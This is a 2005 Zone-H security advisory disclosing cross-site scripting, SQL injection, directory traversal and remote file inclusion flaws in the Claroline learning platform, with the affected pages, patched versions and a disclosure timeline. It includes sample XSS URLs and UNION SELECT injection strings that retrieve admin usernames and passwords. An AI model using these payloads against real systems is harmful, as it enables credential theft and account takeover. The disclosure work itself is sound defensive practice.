Zone-H Research Center Security Advisory 200501
http://fr.zone-h.org
Date of release: 27/04/2005
Software: Claroline (www.claroline.net)
Affected versions:
1.5.3
1.6 beta
1.6 Release Candidate 1
(probably previous versions too)
Risk: High
Discovered by:
Kevin Fernandez "Siegfried"
Mehdi Oudad "deepfear"
from the Zone-H Research Team
Background (from their web site)
----------
Claroline is an Open Source software based on PHP/MySQL. It's a collaborative learning environment allowing teachers or education institutions to create and administer courses through the web.
Description
-----------
Multiple Cross site scripting, 10 SQL injection, 7 directory traversal and 4 remote file inclusion vulnerabilities have been found in Claroline.
Details
-------
1)Multiple Cross site scripting vulnerabilities have been found in the following pages:
claroline/exercice/exercise_result.php
claroline/exercice/exercice_submit.php
claroline/calendar/myagenda.php
claroline/calendar/agenda.php
claroline/tracking/user_access_details.php
claroline/tracking/toolaccess_details.php
claroline/learnPath/learningPathList.php
claroline/learnPath/learningPathAdmin.php
claroline/learnPath/learningPath.php
claroline/tracking/userLog.php
[..]
Examples:
claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[..]
2)10 SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin, arbitrary teachers or students.
claroline/learnPath/learningPath.php (3)
claroline/tracking/exercises_details.php
claroline/learnPath/learningPathAdmin.php
claroline/tracking/learnPath_details.php
claroline/user/userInfo.php (2)
claroline/learnPath/modules_pool.php
claroline/learnPath/module.php
Examples:
claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--
[..]
3)Multiple directory traversal vulnerabilities in "claroline/document/document.php" and "claroline/learnPath/insertMyDoc.php" could allow project administrators (teachers) to upload files in arbitrary folders or copy/move/delete (then view) files of arbitrary folders by performing directory traversal attacks.
4)Four remote file inclusion vulnerabilities have been discovered.
Solution
--------
The Claroline users are urged to update to version 1.54 or 1.6 final:
http://www.claroline.net/download.htm
See also:
http://www.claroline.net/news.php#85
http://www.claroline.net/news.php#86
Timeline
--------
18/04 Vulnerabilities found
22/04 Vendor contacted (quick answer)
25/04 Claroline 1.54 released
26/04 Claroline 1.6 final released
27/04 Users alerted via the mailing list
27/04 Advisory released
French version available here: http://fr.zone-h.org/fr/advisories/read/id=180/
English version: http://www.zone-h.org/advisories/read/id=7472
Zone-H Research Center
http://fr.zone-h.org
Join us on #zone-h @ irc.eu.freenode.net
You can contact the team leader at deepfear@private-h.org
Thanks to University Montpellier 2.
This archive was generated by hypermail 2.1.3 : Wed Apr 27 2005 - 13:42:31 PDT